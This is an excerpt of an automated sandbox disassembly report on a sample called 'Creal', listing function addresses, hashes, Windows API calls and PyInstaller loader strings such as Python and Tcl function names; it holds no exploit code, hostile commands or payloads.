                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction ID: 665b62b8781762c413846b8fd623c94bd1d4d5dea1795e7063e0d88f298aab5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 67F0FE10F2928645FE946F716A4167D11945F887A0F480732DD2EC6AC9DD2CF4A18651

                                                                                                                                                                                                                                                        Non-executed Functions

                                                                                                                                                                                                                                                        Function 00007FF6D92476C0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                                        • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                                        • Opcode ID: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction ID: 67368dc6e4cfa4e6ac1a29894f0b3ce193d96c8a97206f6bc912c410d673ef24
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 939c8a0ebf27c7f5789cd4a10996167767bc86255d761b2ba34a42bc6fc861e3
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A902D824A2EB0BC0FA159F56AE1457C23A5BF18744F441137D82EC6AA0EF3CB579C780
                                                                                                                                                                                                                                                        Function 00007FF6D924D12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3140674995-0
                                                                                                                                                                                                                                                        • Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                        • Instruction ID: e24f27fff603baf5603516c66a84f0443c3a115bbc2d977c42aed604b4cb0585
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1313E76618B8186FB609F60E8903EE73A4FB98748F44413ADA4E87B95DF38D558CB10
                                                                                                                                                                                                                                                        Function 00007FF6D925A614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1239891234-0
                                                                                                                                                                                                                                                        • Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction ID: e892f0837ace082600236e75137d066ff9c9de858a8304ebe6160bd2fe677e95
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 37319536628F8186EB60CF25E9402AE73A4FB88758F540136EA9D83B98DF3CD555CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9261874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2227656907-0
                                                                                                                                                                                                                                                        • Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                        • Instruction ID: c5ddc048e099199de1637b0649a021cad54cb74c176c1098b036de56783ecf5d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 03B1A522B3869241FA619F2196121BD63A1EF85BE4F445133DA5D87FDADE3CF461C380
                                                                                                                                                                                                                                                        Function 00007FF6D9245830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245840
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245852
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245889
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924589B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458B4
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458C6
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458DF
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92458F1
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924590D
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924591F
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924593B
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924594D
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245969
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D924597B
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D9245997
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92459A9
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92459C5
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00007FF6D92464CF,?,00007FF6D924336E), ref: 00007FF6D92459D7
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                        • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                        • API String ID: 199729137-653951865
                                                                                                                                                                                                                                                        • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction ID: 96a26c9935e6063a934eb45478fae5e81f29b7f3701d4e7b03b3a1a5d4f336a0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC22C860A2EB0791FA19FF96AE1457C23A5AF19741F445037C95E82AA1FF3CB478C380
                                                                                                                                                                                                                                                        Function 00007FF6D92481D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9249390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6D92445F4,00000000,00007FF6D9241985), ref: 00007FF6D92493C9
                                                                                                                                                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6D92486B7,?,?,00000000,00007FF6D9243CBB), ref: 00007FF6D924822C
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF6D9242810: MessageBoxW.USER32 ref: 00007FF6D92428EA
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                        • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                        • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                        • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                        • Instruction ID: 156760c5f651e81842da51f12cbf3d22bc86fba98d12fdeee567a82f5d0e316b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 66516711A3DA8241FB51DF25EB516BE67A0AFA8784F444433DA0EC6AD5EE3CE524CB40
                                                                                                                                                                                                                                                        Function 00007FF6D9242180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                        • String ID: P%
                                                                                                                                                                                                                                                        • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                        • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction ID: 2ad318d09c31b01384c84aece63c5d37d4ad13c3e219e85cbc35539fd67edcfd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6551C8266187A186E6349F36E4181BEB7A1F798B61F004126EFDE83694DF3CD055DB10
                                                                                                                                                                                                                                                        Function 00007FF6D92480C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                                        • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                                        • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                                        • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction ID: 10e5255e5a3970cd0e2e5b1ea774b2a911777a1e41fe8763d67911bd5c4ae01d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE219F21B3DA4282FB418F7AAE5417D6350EF98B90F484233DA2EC3BD4DE3CD5A18640
                                                                                                                                                                                                                                                        Function 00007FF6D9256290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                        • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                        • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction ID: ff251f95c1c907146073f5f1bdb0616310ae8540ad0dcb1e5908bc13350ca6ee
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1B129372E2C24386FBA05E14D35867F76A2FB50754F844137E68986ADCDF3CE9A48B04
                                                                                                                                                                                                                                                        Function 00007FF6D9250FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_7ff6d9240000_Creal.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                        • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                        • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction ID: c775a23e9d90dbb507fe37823e92e50a14423abe72f6b41915dfa5909911dd22
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA12A672E2C14386FBA45E14E25667D76A1FB40754F884033E69AC7ACDDF7CE8A08B10
                                                                                                                                                                                                                                                        Function 00007FF6D9241050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.2443674635.00007FF6D9241000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6D9240000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443644124.00007FF6D9240000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443713204.00007FF6D926B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D927E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443747593.00007FF6D9282000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000002.00000002.2443809185.00007FF6D9284000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
